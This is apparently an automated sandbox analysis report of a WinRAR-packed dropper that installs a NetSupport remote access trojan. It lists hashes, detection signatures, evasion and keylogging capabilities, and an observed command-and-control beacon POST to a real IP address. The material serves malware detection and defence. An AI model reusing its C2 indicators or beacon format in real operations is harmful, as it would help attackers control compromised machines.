Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542259
MD5:17f5a1ae03a0ff4eb038527de02e8860
SHA1:66e04a8d2fbe629115cad3f39bedc33256a8f35a
SHA256:6a8f94da45c0b3b791bbfb71b2e9a7cc6bd5dd777da0655ebc3137ad4070c72f
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 17F5A1AE03A0FF4EB038527DE02E8860)
    • bild.exe (PID: 7716 cmdline: "C:\Users\Public\Pictures\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Pictures\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Pictures\bild.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Pictures\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Pictures\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Pictures\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000001.00000002.4178457146.0000000000222000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000001.00000000.1735795513.0000000000222000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 7 entries
                      SourceRuleDescriptionAuthorStrings
                      1.0.bild.exe.220000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        1.2.bild.exe.220000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          1.2.bild.exe.6d120000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            1.2.bild.exe.6d100000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              1.2.bild.exe.111b79e0.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                                Click to see the 6 entries

                                System Summary

                                barindex
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Pictures\bild.exe" , CommandLine: "C:\Users\Public\Pictures\bild.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Pictures\bild.exe, NewProcessName: C:\Users\Public\Pictures\bild.exe, OriginalFileName: C:\Users\Public\Pictures\bild.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7548, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\Public\Pictures\bild.exe" , ProcessId: 7716, ProcessName: bild.exe
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 185.215.113.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Pictures\bild.exe, Initiated: true, ProcessId: 7716, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-25T18:05:04.643603+020028277451Malware Command and Control Activity Detected192.168.2.449730185.215.113.67443TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\Users\Public\Pictures\bild.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Pictures\remcmdstub.exeReversingLabs: Detection: 13%
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.5% probability
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,1_2_110AD570
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Pictures\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000001.00000002.4180868300.000000006C981000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000001.00000002.4181166197.000000006D122000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000001.00000002.4178457146.0000000000222000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000001.00000000.1735795513.0000000000222000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000001.00000002.4181039734.000000006D105000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0044A273
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0045A537
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,1_2_1102D330
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,1_2_11065890
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,1_2_1106A0A0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,1_2_111266E0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,1_2_1110AFD0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 185.215.113.67:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 185.215.113.67 185.215.113.67
                                Source: Joe Sandbox ViewIP Address: 185.215.113.67 185.215.113.67
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://185.215.113.67/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.215.113.67Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: bild.exe, bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, 00000001.00000002.4180015307.0000000005630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/
                                Source: bild.exe, 00000001.00000002.4180015307.0000000005630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/are
                                Source: bild.exe, 00000001.00000002.4178688814.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: bild.exe, 00000001.00000002.4178688814.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000003.1743479292.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: bild.exe, 00000001.00000002.4178688814.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspl
                                Source: bild.exe, 00000001.00000002.4178688814.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspq-
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,1_2_1101F6B0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,1_2_1101F6B0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,1_2_11032EE0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,1_2_110321E0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,1_2_110076F0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,1_2_11113880
                                Source: Yara matchFile source: 1.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.335d800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7548, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7716, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Pictures\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,1_2_111158B0
                                Source: C:\Users\Public\Pictures\bild.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00447070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00447070
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,1_2_1115DB40
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,1_2_1102D330
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004559840_2_00455984
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004484090_2_00448409
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044E0450_2_0044E045
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046E8D40_2_0046E8D4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004530E60_2_004530E6
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045E94A0_2_0045E94A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044D1D20_2_0044D1D2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045F25E0_2_0045F25E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004432030_2_00443203
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044BA1A0_2_0044BA1A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045FAC80_2_0045FAC8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046A35E0_2_0046A35E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00462B780_2_00462B78
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452B3A0_2_00452B3A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044DBE20_2_0044DBE2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004563F20_2_004563F2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044EC970_2_0044EC97
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044D5E40_2_0044D5E4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452DB50_2_00452DB5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00455DB90_2_00455DB9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045EE460_2_0045EE46
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00445E960_2_00445E96
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045F6930_2_0045F693
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00469EB00_2_00469EB0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044276C0_2_0044276C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00443FC50_2_00443FC5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00454FB50_2_00454FB5
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110733B01_2_110733B0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110295901_2_11029590
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11061C901_2_11061C90
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110330101_2_11033010
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111632201_2_11163220
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111674851_2_11167485
